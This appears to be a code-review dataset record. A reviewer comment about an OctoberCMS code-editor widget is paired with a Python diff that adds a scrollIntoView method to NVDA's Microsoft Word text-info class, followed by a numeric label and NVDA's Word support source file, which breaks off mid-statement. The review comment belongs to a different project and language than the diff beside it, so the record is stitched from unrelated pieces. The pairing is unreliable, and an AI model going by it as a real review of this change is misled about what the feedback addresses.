This can't exist here either because the code editor can be used on other models than CMS templates. You could probably implement this as a `hint` property (so `hint: cms::lang.cms_object.safe_mode_enabled`) on the codeeditor formwidget instead though and I'd be fine with that.
octobercms-october
php
@@ -888,6 +888,15 @@ class WordDocumentTextInfo(textInfos.TextInfo): field['line-prefix']=mapPUAToUnicode.get(bullet,bullet) return field + def scrollIntoView(self): + try: + self.obj.WinwordWindowObject.ScrollIntoView(self._rangeObj, True) + except COMError: + log.exception("Can't scroll") + pass + + + def expand(self,unit): if unit==textInfos.UNIT_LINE: try:
1
# A part of NonVisual Desktop Access (NVDA) # Copyright (C) 2006-2020 NV Access Limited, Manish Agrawal, Derek Riemer, Babbage B.V. # This file is covered by the GNU General Public License. # See the file COPYING for more details. import ctypes import time from comtypes import COMError, GUID, BSTR import comtypes.client import comtypes.automation import uuid import operator import locale import collections import colorsys import eventHandler import braille from scriptHandler import script import languageHandler import ui import NVDAHelper import XMLFormatting from logHandler import log import winUser import oleacc import globalVars import speech import config import textInfos import textInfos.offsets import colors import controlTypes import treeInterceptorHandler import browseMode import review from cursorManager import CursorManager, ReviewCursorManager from tableUtils import HeaderCellInfo, HeaderCellTracker from . import Window from ..behaviors import EditableTextWithoutAutoSelectDetection from . import _msOfficeChart import locationHelper #Word constants #wdLineSpacing rules wdLineSpaceSingle=0 wdLineSpace1pt5=1 wdLineSpaceDouble=2 wdLineSpaceAtLeast=3 wdLineSpaceExactly=4 wdLineSpaceMultiple=5 # wdMeasurementUnits wdInches=0 wdCentimeters=1 wdMillimeters=2 wdPoints=3 wdPicas=4 wdCollapseEnd=0 wdCollapseStart=1 #Indexing wdActiveEndAdjustedPageNumber=1 wdActiveEndPageNumber=3 wdNumberOfPagesInDocument=4 wdHorizontalPositionRelativeToPage=5 wdVerticalPositionRelativeToPage=6 wdFirstCharacterLineNumber=10 wdWithInTable=12 wdStartOfRangeRowNumber=13 wdMaximumNumberOfRows=15 wdStartOfRangeColumnNumber=16 wdMaximumNumberOfColumns=18 #Horizontal alignment wdAlignParagraphLeft=0 wdAlignParagraphCenter=1 wdAlignParagraphRight=2 wdAlignParagraphJustify=3 #Units wdCharacter=1 wdWord=2 wdSentence=3 wdParagraph=4 wdLine=5 wdStory=6 wdColumn=9 wdRow=10 wdWindow=11 wdCell=12 wdCharFormat=13 wdParaFormat=14 wdTable=15 #GoTo - direction wdGoToAbsolute=1 wdGoToRelative=2 wdGoToNext=2 wdGoToPrevious=3 #GoTo - units wdGoToBookmark=-1 wdGoToSection=0 wdGoToPage=1 wdGoToTable=2 wdGoToLine=3 wdGoToFootnote=4 wdGoToEndnote=5 wdGoToComment=6 wdGoToField=7 wdGoToGraphic=8 wdGoToObject=9 wdGoToEquation=10 wdGoToHeading=11 wdGoToPercent=12 wdGoToSpellingError=13 wdGoToGrammaticalError=14 wdGoToProofreadingError=15 wdCommentsStory=4 wdEndnotesStory=3 wdEvenPagesFooterStory=8 wdEvenPagesHeaderStory=6 wdFirstPageFooterStory=11 wdFirstPageHeaderStory=10 wdFootnotesStory=2 wdMainTextStory=1 wdPrimaryFooterStory=9 wdPrimaryHeaderStory=7 wdTextFrameStory=5 wdFieldFormTextInput=70 wdFieldFormCheckBox=71 wdFieldFormDropDown=83 wdContentControlRichText=0 wdContentControlText=1 wdContentControlPicture=2 wdContentControlComboBox=3 wdContentControlDropdownList=4 wdContentControlBuildingBlockGallery=5 wdContentControlDate=6 wdContentControlGroup=7 wdContentControlCheckBox=8 wdInlineShapeChart=12 wdNoRevision=0 wdRevisionInsert=1 wdRevisionDelete=2 wdRevisionProperty=3 wdRevisionParagraphNumber=4 wdRevisionDisplayField=5 wdRevisionReconcile=6 wdRevisionConflict=7 wdRevisionStyle=8 wdRevisionReplace=9 wdRevisionParagraphProperty=10 wdRevisionTableProperty=11 wdRevisionSectionProperty=12 wdRevisionStyleDefinition=13 wdRevisionMovedFrom=14 wdRevisionMovedTo=15 wdRevisionCellInsertion=16 wdRevisionCellDeletion=17 wdRevisionCellMerge=18 # MsoThemeColorSchemeIndex msoThemeAccent1=5 msoThemeAccent2=6 msoThemeAccent3=7 msoThemeAccent4=8 msoThemeAccent5=9 msoThemeAccent6=10 msoThemeDark1=1 msoThemeDark2=3 msoThemeFollowedHyperlink=12 msoThemeHyperlink=11 msoThemeLight1=2 msoThemeLight2=4 # WdThemeColorIndex wdNotThemeColor=-1 wdThemeColorAccent1=4 wdThemeColorAccent2=5 wdThemeColorAccent3=6 wdThemeColorAccent4=7 wdThemeColorAccent5=8 wdThemeColorAccent6=9 wdThemeColorBackground1=12 wdThemeColorBackground2=14 wdThemeColorHyperlink=10 wdThemeColorHyperlinkFollowed=11 wdThemeColorMainDark1=0 wdThemeColorMainDark2=2 wdThemeColorMainLight1=1 wdThemeColorMainLight2=3 wdThemeColorText1=13 wdThemeColorText2=15 # Word Field types FIELD_TYPE_REF = 3 # cross reference field FIELD_TYPE_HYPERLINK = 88 # hyperlink field # Mapping from http://www.wordarticles.com/Articles/Colours/2007.php#UIConsiderations WdThemeColorIndexToMsoThemeColorSchemeIndex={ wdThemeColorMainDark1:msoThemeDark1, wdThemeColorMainLight1:msoThemeLight1, wdThemeColorMainDark2:msoThemeDark2, wdThemeColorMainLight2:msoThemeLight2, wdThemeColorAccent1:msoThemeAccent1, wdThemeColorAccent2:msoThemeAccent2, wdThemeColorAccent3:msoThemeAccent3, wdThemeColorAccent4:msoThemeAccent4, wdThemeColorAccent5:msoThemeAccent5, wdThemeColorAccent6:msoThemeAccent6, wdThemeColorHyperlink:msoThemeHyperlink, wdThemeColorHyperlinkFollowed:msoThemeFollowedHyperlink, wdThemeColorBackground1:msoThemeLight1, wdThemeColorText1:msoThemeDark1, wdThemeColorBackground2:msoThemeLight2, wdThemeColorText2:msoThemeDark2, } wdRevisionTypeLabels={ # Translators: a Microsoft Word revision type (inserted content) wdRevisionInsert:_("insertion"), # Translators: a Microsoft Word revision type (deleted content) wdRevisionDelete:_("deletion"), # Translators: a Microsoft Word revision type (changed content property, e.g. font, color) wdRevisionProperty:_("property"), # Translators: a Microsoft Word revision type (changed paragraph number) wdRevisionParagraphNumber:_("paragraph number"), # Translators: a Microsoft Word revision type (display field) wdRevisionDisplayField:_("display field"), # Translators: a Microsoft Word revision type (reconcile) wdRevisionReconcile:_("reconcile"), # Translators: a Microsoft Word revision type (conflicting revision) wdRevisionConflict:_("conflict"), # Translators: a Microsoft Word revision type (style change) wdRevisionStyle:_("style"), # Translators: a Microsoft Word revision type (replaced content) wdRevisionReplace:_("replace"), # Translators: a Microsoft Word revision type (changed paragraph property, e.g. alignment) wdRevisionParagraphProperty:_("paragraph property"), # Translators: a Microsoft Word revision type (table) wdRevisionTableProperty:_("table property"), # Translators: a Microsoft Word revision type (section property) wdRevisionSectionProperty:_("section property"), # Translators: a Microsoft Word revision type (style definition) wdRevisionStyleDefinition:_("style definition"), # Translators: a Microsoft Word revision type (moved from) wdRevisionMovedFrom:_("moved from"), # Translators: a Microsoft Word revision type (moved to) wdRevisionMovedTo:_("moved to"), # Translators: a Microsoft Word revision type (inserted table cell) wdRevisionCellInsertion:_("cell insertion"), # Translators: a Microsoft Word revision type (deleted table cell) wdRevisionCellDeletion:_("cell deletion"), # Translators: a Microsoft Word revision type (merged table cells) wdRevisionCellMerge:_("cell merge"), } storyTypeLocalizedLabels={ wdCommentsStory:_("Comments"), wdEndnotesStory:_("Endnotes"), wdEvenPagesFooterStory:_("Even pages footer"), wdEvenPagesHeaderStory:_("Even pages header"), wdFirstPageFooterStory:_("First page footer"), wdFirstPageHeaderStory:_("First page header"), wdFootnotesStory:_("Footnotes"), wdPrimaryFooterStory:_("Primary footer"), wdPrimaryHeaderStory:_("Primary header"), wdTextFrameStory:_("Text frame"), } wdFieldTypesToNVDARoles={ wdFieldFormTextInput:controlTypes.Role.EDITABLETEXT, wdFieldFormCheckBox:controlTypes.Role.CHECKBOX, wdFieldFormDropDown:controlTypes.Role.COMBOBOX, } wdContentControlTypesToNVDARoles={ wdContentControlRichText:controlTypes.Role.EDITABLETEXT, wdContentControlText:controlTypes.Role.EDITABLETEXT, wdContentControlPicture:controlTypes.Role.GRAPHIC, wdContentControlComboBox:controlTypes.Role.COMBOBOX, wdContentControlDropdownList:controlTypes.Role.COMBOBOX, wdContentControlDate:controlTypes.Role.EDITABLETEXT, wdContentControlGroup:controlTypes.Role.GROUPING, wdContentControlCheckBox:controlTypes.Role.CHECKBOX, } winwordWindowIid=GUID('{00020962-0000-0000-C000-000000000046}') wm_winword_expandToLine=ctypes.windll.user32.RegisterWindowMessageW(u"wm_winword_expandToLine") NVDAUnitsToWordUnits={ textInfos.UNIT_CHARACTER:wdCharacter, textInfos.UNIT_WORD:wdWord, textInfos.UNIT_LINE:wdLine, textInfos.UNIT_SENTENCE:wdSentence, textInfos.UNIT_PARAGRAPH:wdParagraph, textInfos.UNIT_TABLE:wdTable, textInfos.UNIT_CELL:wdCell, textInfos.UNIT_ROW:wdRow, textInfos.UNIT_COLUMN:wdColumn, textInfos.UNIT_STORY:wdStory, textInfos.UNIT_READINGCHUNK:wdSentence, } formatConfigFlagsMap = { "reportFontName": 0x1, "reportFontSize": 0x2, "reportFontAttributes": 0x4, "reportColor": 0x8, "reportAlignment": 0x10, "reportStyle": 0x20, "reportSpellingErrors": 0x40, "reportPage": 0x80, "reportLineNumber": 0x100, "reportTables": 0x200, "reportLists": 0x400, "reportLinks": 0x800, "reportComments": 0x1000, "reportHeadings": 0x2000, "autoLanguageSwitching": 0x4000, "reportRevisions": 0x8000, "reportParagraphIndentation": 0x10000, "reportLineSpacing": 0x40000, "reportSuperscriptsAndSubscripts": 0x80000, "reportGraphics": 0x100000, } formatConfigFlag_includeLayoutTables = 0x20000 # Map some characters from 0 to Unicode. Meant to be used with bullets only. # Doesn't care about the actual font, so can give incorrect Unicode in rare cases. mapPUAToUnicode = { # from : to # fontname u'\uF06E': u'\u25A0', # Wingdings (black square) u'\uF076': u'\u2756', # Wingdings (black diamond minus white x u'\uF0A7': u'\u25AA', # Symbol (black small square) u'\uF0A8': u'\u2666', # Symbol (black diamond suit) u'\uF0B7': u'\u2022', # Symbol (bullet) u'\uF0D8': u'\u2B9A', # Wingdings (three-D top-lighted RIGHTWARDS equilateral arrowhead) u'\uF0E8': u'\U0001f87a', # Wingdings (wide-headed rightwards heavy barb arrow) u'\uF0F0': u'\u21E8', # Wingdings (right white arrow) u'\uF0FC': u'\u2714', # Wingdings (heavy check mark) } class WordDocumentHeadingQuickNavItem(browseMode.TextInfoQuickNavItem): def __init__(self,nodeType,document,textInfo,level): self.level=level super(WordDocumentHeadingQuickNavItem,self).__init__(nodeType,document,textInfo) def isChild(self,parent): if not isinstance(parent,WordDocumentHeadingQuickNavItem): return False return self.level>parent.level class WordDocumentCollectionQuickNavItem(browseMode.TextInfoQuickNavItem): """ A QuickNavItem representing an item that MS Word stores as a collection (e.g. link, table etc). """ def rangeFromCollectionItem(self,item): """ Fetches a Microsoft Word range object from a Microsoft Word item in a collection. E.g. a HyperLink object. @param item: an item from a collection (E.g. a HyperLink object). """ return item.range def __init__(self,itemType,document,collectionItem): """ See L{TextInfoQuickNavItem} for itemType and document argument definitions. @param collectionItem: an item from an MS Word collection e.g. HyperLink object. """ self.collectionItem=collectionItem self.rangeObj=self.rangeFromCollectionItem(collectionItem) textInfo=BrowseModeWordDocumentTextInfo(document,None,_rangeObj=self.rangeObj) super(WordDocumentCollectionQuickNavItem,self).__init__(itemType,document,textInfo) class WordDocumentCommentQuickNavItem(WordDocumentCollectionQuickNavItem): @property def label(self): author=self.collectionItem.author date=self.collectionItem.date text=self.collectionItem.range.text # Translators: The label shown for a comment in the NVDA Elements List dialog in Microsoft Word. # {text}, {author} and {date} will be replaced by the corresponding details about the comment. return _(u"comment: {text} by {author} on {date}").format(author=author,text=text,date=date) def rangeFromCollectionItem(self,item): return item.scope class WordDocumentFieldQuickNavItem(WordDocumentCollectionQuickNavItem): def rangeFromCollectionItem(self,item): return item.result class WordDocumentRevisionQuickNavItem(WordDocumentCollectionQuickNavItem): @property def label(self): revisionType=wdRevisionTypeLabels.get(self.collectionItem.type) author=self.collectionItem.author or "" date=self.collectionItem.date description=self.collectionItem.formatDescription or "" text=(self.collectionItem.range.text or "")[:100] # Translators: The label shown for an editor revision (tracked change) in the NVDA Elements List dialog in Microsoft Word. # {revisionType} will be replaced with the type of revision; e.g. insertion, deletion or property. # {description} will be replaced with a description of the formatting changes, if any. # {text}, {author} and {date} will be replaced by the corresponding details about the revision. return _(u"{revisionType} {description}: {text} by {author} on {date}").format(revisionType=revisionType,author=author,text=text,date=date,description=description) class WordDocumentChartQuickNavItem(WordDocumentCollectionQuickNavItem): @property def label(self): text="" if self.collectionItem.Chart.HasTitle: text=self.collectionItem.Chart.ChartTitle.Text else: text=self.collectionItem.Chart.Name return u"{text}".format(text=text) def moveTo(self): chartNVDAObj = _msOfficeChart.OfficeChart(windowHandle= self.document.rootNVDAObject.windowHandle, officeApplicationObject=self.rangeObj.Document.Application, officeChartObject=self.collectionItem.Chart , initialDocument = self.document.rootNVDAObject ) eventHandler.queueEvent("gainFocus",chartNVDAObj) class WordDocumentSpellingErrorQuickNavItem(WordDocumentCollectionQuickNavItem): def rangeFromCollectionItem(self,item): return item @property def label(self): text=self.collectionItem.text # Translators: The label shown for a spelling error in the NVDA Elements List dialog in Microsoft Word. # {text} will be replaced with the text of the spelling error. return _(u"spelling: {text}").format(text=text) class WinWordCollectionQuicknavIterator(object): """ Allows iterating over an MS Word collection (e.g. HyperLinks) emitting L{QuickNavItem} objects. """ quickNavItemClass=WordDocumentCollectionQuickNavItem #: the QuickNavItem class that should be instanciated and emitted. def __init__(self,itemType,document,direction,rangeObj,includeCurrent): """ See L{QuickNavItemIterator} for itemType, document and direction definitions. @param rangeObj: a Microsoft Word range object where the collection should be fetched from. @param includeCurrent: if true then any item at the initial position will be also emitted rather than just further ones. """ self.document=document self.itemType=itemType self.direction=direction if direction else "next" self.rangeObj=rangeObj self.includeCurrent=includeCurrent def collectionFromRange(self,rangeObj): """ Fetches a Microsoft Word collection object from a Microsoft Word range object. E.g. HyperLinks from a range. @param rangeObj: a Microsoft Word range object. @return: a Microsoft Word collection object. """ raise NotImplementedError def filter(self,item): """ Only allows certain items fom a collection to be emitted. E.g. a table who's borders are enabled. @param item: an item from a Microsoft Word collection (e.g. HyperLink object). @return True if this item should be allowd, false otherwise. @rtype: bool """ return True def iterate(self): """ returns a generator that emits L{QuickNavItem} objects for this collection. """ if self.direction=="next": self.rangeObj.moveEnd(wdStory,1) elif self.direction=="previous": self.rangeObj.collapse(wdCollapseStart) self.rangeObj.moveStart(wdStory,-1) items=self.collectionFromRange(self.rangeObj) itemCount=items.count isFirst=True for index in range(1,itemCount+1): if self.direction=="previous": index=itemCount-(index-1) collectionItem=items[index] try: item=self.quickNavItemClass(self.itemType,self.document,collectionItem) except COMError: message = ("Error iterating over item with " "type: {type}, iteration direction: {dir}, total item count: {count}, item at index: {index}" "\nThis could be caused by an issue with some element within or a corruption of the word document." ).format(type=self.itemType, dir=self.direction, count=itemCount, index=index) log.debugWarning(message ,exc_info=True) continue itemRange=item.rangeObj # Skip over the item we're already on. if not self.includeCurrent and isFirst and ((self.direction=="next" and itemRange.start<=self.rangeObj.start) or (self.direction=="previous" and itemRange.end>self.rangeObj.end)): continue if not self.filter(collectionItem): continue yield item isFirst=False class LinkWinWordCollectionQuicknavIterator(WinWordCollectionQuicknavIterator): quickNavItemClass=WordDocumentFieldQuickNavItem def collectionFromRange(self,rangeObj): return rangeObj.fields def filter(self, item): t = item.type if t == FIELD_TYPE_REF: fieldText = item.code.text.strip().split(' ') # ensure that the text has a \\h in it return any( fieldText[i] == '\\h' for i in range(2, len(fieldText)) ) return t == FIELD_TYPE_HYPERLINK class CommentWinWordCollectionQuicknavIterator(WinWordCollectionQuicknavIterator): quickNavItemClass=WordDocumentCommentQuickNavItem def collectionFromRange(self,rangeObj): return rangeObj.comments class RevisionWinWordCollectionQuicknavIterator(WinWordCollectionQuicknavIterator): quickNavItemClass=WordDocumentRevisionQuickNavItem def collectionFromRange(self,rangeObj): return rangeObj.revisions class SpellingErrorWinWordCollectionQuicknavIterator(WinWordCollectionQuicknavIterator): quickNavItemClass=WordDocumentSpellingErrorQuickNavItem def collectionFromRange(self,rangeObj): return rangeObj.spellingErrors class GraphicWinWordCollectionQuicknavIterator(WinWordCollectionQuicknavIterator): def collectionFromRange(self,rangeObj): return rangeObj.inlineShapes def filter(self,item): return 2<item.type<5 class TableWinWordCollectionQuicknavIterator(WinWordCollectionQuicknavIterator): def collectionFromRange(self,rangeObj): return rangeObj.tables def filter(self,item): return config.conf["documentFormatting"]["includeLayoutTables"] or item.borders.enable class ChartWinWordCollectionQuicknavIterator(WinWordCollectionQuicknavIterator): quickNavItemClass=WordDocumentChartQuickNavItem def collectionFromRange(self,rangeObj): return rangeObj.inlineShapes def filter(self,item): return item.type==wdInlineShapeChart class LazyControlField_RowAndColumnHeaderText(textInfos.ControlField): def __init__(self, ti): self._ti = ti super().__init__() def get(self, name, default=None): if name == "table-rowheadertext": try: cell = self._ti._rangeObj.cells[1] except IndexError: log.debugWarning("no cells for table row, possibly on end of cell mark") return super().get(name, default) return self._ti.obj.fetchAssociatedHeaderCellText(cell, False) elif name == "table-columnheadertext": try: cell = self._ti._rangeObj.cells[1] except IndexError: log.debugWarning("no cells for table row, possibly on end of cell mark") return super().get(name, default) return self._ti.obj.fetchAssociatedHeaderCellText(cell, True) else: return super().get(name, default) class WordDocumentTextInfo(textInfos.TextInfo): # #4852: temporary fix. # force mouse reading chunk to sentense to make it what it used to be in 2014.4. # We need to however fix line so it does not accidentially scroll. def _get_unit_mouseChunk(self): unit=super(WordDocumentTextInfo,self).unit_mouseChunk if unit==textInfos.UNIT_LINE: unit=textInfos.UNIT_SENTENCE return unit def _get_locationText(self): textList=[] # #8994: MS Word can only give accurate distances (taking paragraph indenting into account) when directly querying the selection. r=self._rangeObj s=self.obj.WinwordSelectionObject if s.isEqual(r): r=s else: return super(WordDocumentTextInfo,self).locationText offset=r.information(wdHorizontalPositionRelativeToPage) distance=self.obj.getLocalizedMeasurementTextForPointSize(offset) # Translators: a distance from the left edge of the page in Microsoft Word textList.append(_("{distance} from left edge of page").format(distance=distance)) offset=r.information(wdVerticalPositionRelativeToPage) distance=self.obj.getLocalizedMeasurementTextForPointSize(offset) # Translators: a distance from the left edge of the page in Microsoft Word textList.append(_("{distance} from top edge of page").format(distance=distance)) return ", ".join(textList) def copyToClipboard(self, notify): self._rangeObj.copy() if notify: ui.reportTextCopiedToClipboard(self.text) return True def find(self,text,caseSensitive=False,reverse=False): f=self._rangeObj.find f.text=text f.matchCase=caseSensitive f.forward=not reverse return f.execute() shouldIncludeLayoutTables=True #: layout tables should always be included (no matter the user's browse mode setting). def activate(self): import mathPres mathMl=mathPres.getMathMlFromTextInfo(self) if mathMl: return mathPres.interactWithMathMl(mathMl) newRng=self._rangeObj.Duplicate newRng.End=newRng.End+1 if newRng.InlineShapes.Count >= 1: if newRng.InlineShapes[1].Type==wdInlineShapeChart: return eventHandler.queueEvent('gainFocus',_msOfficeChart.OfficeChart(windowHandle= self.obj.windowHandle, officeApplicationObject=self.obj.WinwordDocumentObject.Application, officeChartObject=newRng.InlineShapes[1].Chart , initialDocument = self.obj )) # Handle activating links. # It is necessary to expand to word to get a link as the link's first character is never actually in the link! tempRange=self._rangeObj.duplicate tempRange.expand(wdWord) links=tempRange.hyperlinks if links.count>0: links[1].follow() return tempRange.expand(wdParagraph) fields=tempRange.fields for field in (fields.item(i) for i in range(1, fields.count+1)): if field.type != FIELD_TYPE_REF: continue fResult = field.result fResult.moveStart(wdCharacter,-1) # move back one visible character (passed the hidden text eg the code for the reference). fResStart = fResult.start +1 # don't include the character before the hidden text. fResEnd = fResult.end rObjStart = self._rangeObj.start rObjEnd = self._rangeObj.end # check to see if the _rangeObj is inside the fResult range if not (fResStart <= rObjStart and fResEnd >= rObjEnd): continue # text will be something like ' REF _Ref457210120 \\h ' fieldText = field.code.text.strip().split(' ') # the \\h field indicates that the field is a link if not any( fieldText[i] == '\\h' for i in range(2, len(fieldText)) ): log.debugWarning("no \\h for field xref: %s" % field.code.text) continue bookmarkKey = fieldText[1] # we want the _Ref12345 part # get book mark start, we need to look at the whole document to find the bookmark. tempRange.Expand(wdStory) bMark = tempRange.bookmarks(bookmarkKey) self._rangeObj.setRange(bMark.start, bMark.start) self.updateCaret() tiCopy = self.copy() tiCopy.expand(textInfos.UNIT_LINE) speech.speakTextInfo(tiCopy, reason=controlTypes.OutputReason.FOCUS) braille.handler.handleCaretMove(self) return def _expandToLineAtCaret(self): lineStart=ctypes.c_int() lineEnd=ctypes.c_int() res=NVDAHelper.localLib.nvdaInProcUtils_winword_expandToLine(self.obj.appModule.helperLocalBindingHandle,self.obj.documentWindowHandle,self._rangeObj.start,ctypes.byref(lineStart),ctypes.byref(lineEnd)) if res!=0 or lineStart.value==lineEnd.value or lineStart.value==-1 or lineEnd.value==-1: log.debugWarning("winword_expandToLine failed") self._rangeObj.expand(wdParagraph) return self._rangeObj.setRange(lineStart.value,lineEnd.value) def __init__(self,obj,position,_rangeObj=None): super(WordDocumentTextInfo,self).__init__(obj,position) if _rangeObj: self._rangeObj=_rangeObj.Duplicate return if isinstance(position, locationHelper.Point): try: self._rangeObj=self.obj.WinwordDocumentObject.activeWindow.RangeFromPoint(position.x,position.y) except COMError: raise NotImplementedError elif position==textInfos.POSITION_SELECTION: self._rangeObj=self.obj.WinwordSelectionObject.range elif position==textInfos.POSITION_CARET: self._rangeObj=self.obj.WinwordSelectionObject.range self._rangeObj.Collapse() elif position==textInfos.POSITION_ALL: self._rangeObj=self.obj.WinwordSelectionObject.range self._rangeObj.Expand(wdStory) elif position==textInfos.POSITION_FIRST: self._rangeObj=self.obj.WinwordSelectionObject.range self._rangeObj.SetRange(0,0) elif position==textInfos.POSITION_LAST: self._rangeObj=self.obj.WinwordSelectionObject.range self._rangeObj.endOf(wdStory) self._rangeObj.move(wdCharacter,-1) elif isinstance(position,textInfos.offsets.Offsets): self._rangeObj=self.obj.WinwordSelectionObject.range self._rangeObj.SetRange(position.startOffset,position.endOffset) elif isinstance(position,WordDocumentTextInfo): # copying from one textInfo to another self._rangeObj=position._rangeObj.duplicate else: raise NotImplementedError("position: %s"%position) def getTextWithFields(self,formatConfig=None): if self.isCollapsed: return [] if self.obj.ignoreFormatting: return [self.text] extraDetail=formatConfig.get('extraDetail',False) if formatConfig else False if not formatConfig: formatConfig=config.conf['documentFormatting'] formatConfig['autoLanguageSwitching']=config.conf['speech'].get('autoLanguageSwitching',False) startOffset=self._rangeObj.start endOffset=self._rangeObj.end text=BSTR() # #9067: format config flags map is a dictionary. formatConfigFlags=sum(y for x,y in formatConfigFlagsMap.items() if formatConfig.get(x,False)) if self.shouldIncludeLayoutTables: formatConfigFlags+=formatConfigFlag_includeLayoutTables if self.obj.ignoreEditorRevisions: formatConfigFlags&=~formatConfigFlagsMap['reportRevisions'] if self.obj.ignorePageNumbers: formatConfigFlags&=~formatConfigFlagsMap['reportPage'] res=NVDAHelper.localLib.nvdaInProcUtils_winword_getTextInRange(self.obj.appModule.helperLocalBindingHandle,self.obj.documentWindowHandle,startOffset,endOffset,formatConfigFlags,ctypes.byref(text)) if res or not text: log.debugWarning("winword_getTextInRange failed with %d"%res) return [self.text] commandList=XMLFormatting.XMLTextParser().parse(text.value) for index,item in enumerate(commandList): if isinstance(item,textInfos.FieldCommand): field=item.field if isinstance(field,textInfos.ControlField): item.field=self._normalizeControlField(field) elif isinstance(field,textInfos.FormatField): item.field=self._normalizeFormatField(field,extraDetail=extraDetail) elif index>0 and isinstance(item,str) and item.isspace(): #2047: don't expose language for whitespace as its incorrect for east-asian languages lastItem=commandList[index-1] if isinstance(lastItem,textInfos.FieldCommand) and isinstance(lastItem.field,textInfos.FormatField): try: del lastItem.field['language'] except KeyError: pass return commandList def _normalizeControlField(self,field): role=field.pop('role',None) if role=="heading": role=controlTypes.Role.HEADING elif role=="table": role=controlTypes.Role.TABLE field['table-rowcount']=int(field.get('table-rowcount',0)) field['table-columncount']=int(field.get('table-columncount',0)) elif role=="tableCell": role=controlTypes.Role.TABLECELL field['table-rownumber']=int(field.get('table-rownumber',0)) field['table-columnnumber']=int(field.get('table-columnnumber',0)) elif role=="footnote": role=controlTypes.Role.FOOTNOTE elif role=="endnote": role=controlTypes.Role.ENDNOTE elif role=="graphic": role=controlTypes.Role.GRAPHIC elif role=="chart": role=controlTypes.Role.CHART elif role=="object": progid=field.get("progid") if progid and progid.startswith("Equation.DSMT"): # MathType. role=controlTypes.Role.MATH else: role=controlTypes.Role.EMBEDDEDOBJECT else: fieldType=int(field.pop('wdFieldType',-1)) if fieldType!=-1: role=wdFieldTypesToNVDARoles.get(fieldType,controlTypes.Role.UNKNOWN) if fieldType==wdFieldFormCheckBox and int(field.get('wdFieldResult','0'))>0: field['states']=set([controlTypes.State.CHECKED]) elif fieldType==wdFieldFormDropDown: field['value']=field.get('wdFieldResult',None) fieldStatusText=field.pop('wdFieldStatusText',None) if fieldStatusText: field['name']=fieldStatusText field['alwaysReportName']=True else: fieldType=int(field.get('wdContentControlType',-1)) if fieldType!=-1: role=wdContentControlTypesToNVDARoles.get(fieldType,controlTypes.Role.UNKNOWN) if role==controlTypes.Role.CHECKBOX: fieldChecked=bool(int(field.get('wdContentControlChecked','0'))) if fieldChecked: field['states']=set([controlTypes.State.CHECKED]) fieldTitle=field.get('wdContentControlTitle',None) if fieldTitle: field['name']=fieldTitle field['alwaysReportName']=True if role is not None: field['role']=role if role==controlTypes.Role.TABLE and field.get('longdescription'): field['states']=set([controlTypes.State.HASLONGDESC]) storyType=int(field.pop('wdStoryType',0)) if storyType: name=storyTypeLocalizedLabels.get(storyType,None) if name: field['name']=name field['alwaysReportName']=True field['role']=controlTypes.Role.FRAME newField = LazyControlField_RowAndColumnHeaderText(self) newField.update(field) return newField def _normalizeFormatField(self,field,extraDetail=False): _startOffset=int(field.pop('_startOffset')) _endOffset=int(field.pop('_endOffset')) lineSpacingRule=field.pop('wdLineSpacingRule',None) lineSpacingVal=field.pop('wdLineSpacing',None) if lineSpacingRule is not None: lineSpacingRule=int(lineSpacingRule) if lineSpacingRule==wdLineSpaceSingle: # Translators: single line spacing field['line-spacing']=pgettext('line spacing value',"single") elif lineSpacingRule==wdLineSpaceDouble: # Translators: double line spacing field['line-spacing']=pgettext('line spacing value',"double") elif lineSpacingRule==wdLineSpace1pt5: # Translators: line spacing of 1.5 lines field['line-spacing']=pgettext('line spacing value',"1.5 lines") elif lineSpacingRule==wdLineSpaceExactly: field['line-spacing'] = pgettext( 'line spacing value', # Translators: line spacing of exactly x point "exactly {space:.1f} pt" ).format(space=float(lineSpacingVal)) elif lineSpacingRule==wdLineSpaceAtLeast: # Translators: line spacing of at least x point field['line-spacing']=pgettext('line spacing value',"at least %.1f pt")%float(lineSpacingVal) elif lineSpacingRule==wdLineSpaceMultiple: # Translators: line spacing of x lines field['line-spacing']=pgettext('line spacing value',"%.1f lines")%(float(lineSpacingVal)/12.0) revisionType=int(field.pop('wdRevisionType',0)) if revisionType==wdRevisionInsert: field['revision-insertion']=True elif revisionType==wdRevisionDelete: field['revision-deletion']=True elif revisionType: revisionLabel=wdRevisionTypeLabels.get(revisionType,None) if revisionLabel: field['revision']=revisionLabel color=field.pop('color',None) if color is not None: field['color']=self.obj.winwordColorToNVDAColor(int(color)) try: languageId = int(field.pop('wdLanguageId',0)) if languageId: field['language']=languageHandler.windowsLCIDToLocaleName(languageId) except: log.debugWarning("language error",exc_info=True) pass for x in ("first-line-indent","left-indent","right-indent","hanging-indent"): v=field.get(x) if not v: continue v=float(v) if abs(v)<0.001: v=None else: v=self.obj.getLocalizedMeasurementTextForPointSize(v) field[x]=v bullet=field.get('line-prefix') if bullet and len(bullet)==1: field['line-prefix']=mapPUAToUnicode.get(bullet,bullet) return field def expand(self,unit): if unit==textInfos.UNIT_LINE: try: if self._rangeObj.tables.count>0 and self._rangeObj.cells.count==0: unit=textInfos.UNIT_CHARACTER except COMError: pass if unit==textInfos.UNIT_LINE: self._expandToLineAtCaret() elif unit==textInfos.UNIT_CHARACTER: self._rangeObj.moveEnd(wdCharacter,1) elif unit in NVDAUnitsToWordUnits: self._rangeObj.Expand(NVDAUnitsToWordUnits[unit]) else: raise NotImplementedError("unit: %s"%unit) def compareEndPoints(self,other,which): if which=="startToStart": diff=self._rangeObj.Start-other._rangeObj.Start elif which=="startToEnd": diff=self._rangeObj.Start-other._rangeObj.End elif which=="endToStart": diff=self._rangeObj.End-other._rangeObj.Start elif which=="endToEnd": diff=self._rangeObj.End-other._rangeObj.End else: raise ValueError("bad argument - which: %s"%which) if diff<0: diff=-1 elif diff>0: diff=1 return diff def setEndPoint(self,other,which): if which=="startToStart": self._rangeObj.Start=other._rangeObj.Start elif which=="startToEnd": self._rangeObj.Start=other._rangeObj.End elif which=="endToStart": self._rangeObj.End=other._rangeObj.Start elif which=="endToEnd": self._rangeObj.End=other._rangeObj.End else: raise ValueError("bad argument - which: %s"%which) def _get_isCollapsed(self): if self._rangeObj.Start==self._rangeObj.End: return True else: return False def collapse(self,end=False): if end: oldEndOffset=self._rangeObj.end self._rangeObj.collapse(wdCollapseEnd if end else wdCollapseStart) if end: newEndOffset = self._rangeObj.end # the new endOffset should not have become smaller than the old endOffset, this could cause an infinite loop in # a case where you called move end then collapse until the size of the range is no longer being reduced. # For an example of this see sayAll (specifically readTextHelper_generator in sayAll.py) if newEndOffset < oldEndOffset : raise RuntimeError def copy(self): return 